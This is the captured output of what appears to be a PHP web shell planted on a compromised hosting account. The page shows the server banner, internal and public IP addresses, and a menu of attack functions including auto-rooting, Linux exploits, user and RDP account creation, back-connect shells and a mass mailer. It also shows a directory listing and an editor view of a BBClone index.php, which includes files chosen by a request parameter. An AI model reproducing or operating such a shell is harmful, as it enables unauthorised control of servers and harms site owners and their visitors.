Linux webd002.cluster121.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.121.40.2 | : 216.73.217.99
Cant Read [ /etc/named.conf ]
7.2.34
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
letacommog /
letaweb /
bbclone /
[ HOME SHELL ]
Name
Size
Permission
Action
conf
[ DIR ]
drwx---r-x
css
[ DIR ]
drwx---r-x
doc
[ DIR ]
drwx---r-x
images
[ DIR ]
drwx---r-x
language
[ DIR ]
drwx---r-x
lib
[ DIR ]
drwx---r-x
var
[ DIR ]
drwx---r-x
constants.php
3.99
KB
-rw----r--
index.php
1.08
KB
-rw----r--
log_processor.php
11.22
KB
-rw----r--
mark_page.php
5.06
KB
-rw----r--
show_config.php
3.59
KB
-rw----r--
show_detailed.php
8.54
KB
-rw----r--
show_global.php
13.41
KB
-rw----r--
show_time.php
11.73
KB
-rw----r--
show_views.php
6.34
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php /* This file is part of BBClone (A PHP based Web Counter on Steroids) * * SVN FILE $Id: index.php 312 2014-11-22 10:26:50Z joku $ * * Copyright (C) 2001-2015, the BBClone Team (see doc/authors.txt for details) * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * See doc/copying.txt for details */ define("_MARK_PAGE", "1"); if(!defined("_BBC_PAGE_NAME")){define("_BBC_PAGE_NAME", "BBClone - Start Page");} // Show by default the Global Stats $page = "show_global.php"; if (isset($_REQUEST["p"])) { $page = "show_".trim($_REQUEST["p"]).".php"; } if (is_readable(dirname(__FILE__)."/".$page)) include_once(dirname(__FILE__)."/".$page); ?>
Close